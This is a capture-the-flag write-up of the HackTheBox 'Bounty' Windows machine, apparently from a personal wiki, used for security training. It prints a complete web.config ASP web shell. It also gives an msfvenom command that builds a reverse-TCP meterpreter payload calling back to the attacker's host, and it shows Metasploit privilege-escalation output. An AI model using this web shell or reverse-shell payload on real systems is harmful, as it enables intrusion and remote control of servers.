> For the complete documentation index, see [llms.txt](https://jtnydv.gitbook.io/wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jtnydv.gitbook.io/wiki/write-ups/hackthebox/windows/htb-bounty.md).

# Bounty

### Initial Enumeration

```bash
# Nmap 7.70 scan initiated Thu Jul 18 22:03:22 2019 as: nmap --max-rate 1000 --min-parallelism 1000 -p- -T5 -oN T-all 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.22s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Thu Jul 18 22:05:34 2019 -- 1 IP address (1 host up) scanned in 131.98 seconds
```

![](/files/-Lk5CKbYKHqWW9MeejtU)

```bash
gobuster dir -k -t 200 -w /usr/share/wordlists/dirb/big.txt -o dirb-big -u http://10.10.10.93 -x asp,aspx
```

```bash
/aspnet_client (Status: 301)
/transfer.aspx (Status: 200)
/uploadedfiles (Status: 301)
```

![](/files/-Lk5CP5QYxyo6FWMPm7M)

Using the following links I was able to get to a working web-shell

* <https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/>
* <https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/>
* <https://github.com/tennc/webshell/blob/master/asp/webshell.asp>

web.config code

```bash
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<---- ASP CODE ---->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
```

![](/files/-Lk5D7-8BY11wIBuzo8c)

Now I created a payload to get meterpreter session and uploaded it as `shell.exe.config` which is allowed by the server and using the web-shell I had, I renamed the file to `shell.exe` and then ran it.

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1337 -f exe > shell.exe.config
```

{% hint style="success" %}
NOTE: I was not able to find the `user.txt` flag at first so I just jumped ahead and went for root, however, I had to make the hidden files visible to get the `user.txt` file, which I realised way too late.
{% endhint %}

The shell was a x86 shell so I had to upgrade to x64 shell and then run exploit suggester.

```bash
msf5 exploit(windows/local/payload_inject) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 2
msf5 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Preparing payload at C:\Windows\TEMP\CtBYgVrpsKo.exe
[*] Creating task: APiB17mL
[*] SUCCESS: The scheduled task "APiB17mL" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\APiB17mL...
[*] Original CRC32: 0xd0da0fc9
[*] Final CRC32: 0xd0da0fc9
[*] Writing our modified content back...
[*] Validating task: APiB17mL
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] APiB17mL                                 8/1/2019 8:35:00 PM    Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (179779 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "APiB17mL".
[*] SCHELEVATOR
[*] Deleting the task...
[*] SUCCESS: The scheduled task "APiB17mL" was successfully deleted.
[*] SCHELEVATOR
[*] Meterpreter session 3 opened (10.10.14.7:4444 -> 10.10.10.93:49159) at 2019-07-18 23:12:11 +0530
```

This got me a `NT Authority/System` Shell

### User Own

```bash
C:\Users\merlin\Desktop>attrib *.* -h -s /s /d

C:\Users\merlin\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\merlin\Desktop

05/31/2018  12:17 AM    <DIR>          .
05/31/2018  12:17 AM    <DIR>          ..
05/30/2018  12:22 AM               282 desktop.ini
05/30/2018  11:32 PM                32 user.txt
               2 File(s)            314 bytes
               2 Dir(s)  11,854,745,600 bytes free
C:\Users\merlin\Desktop>type user.txt
e29ad***
```

### Root Own

```bash
C:\Users\Administrator\Desktop>type root.txt
c837f***
```

### Learning Outcome

Enumerate the web directories and file extensions a little better. Always open up the hidden files on the system as soon as you get a shell to make sure you do not miss anything important.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jtnydv.gitbook.io/wiki/write-ups/hackthebox/windows/htb-bounty.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.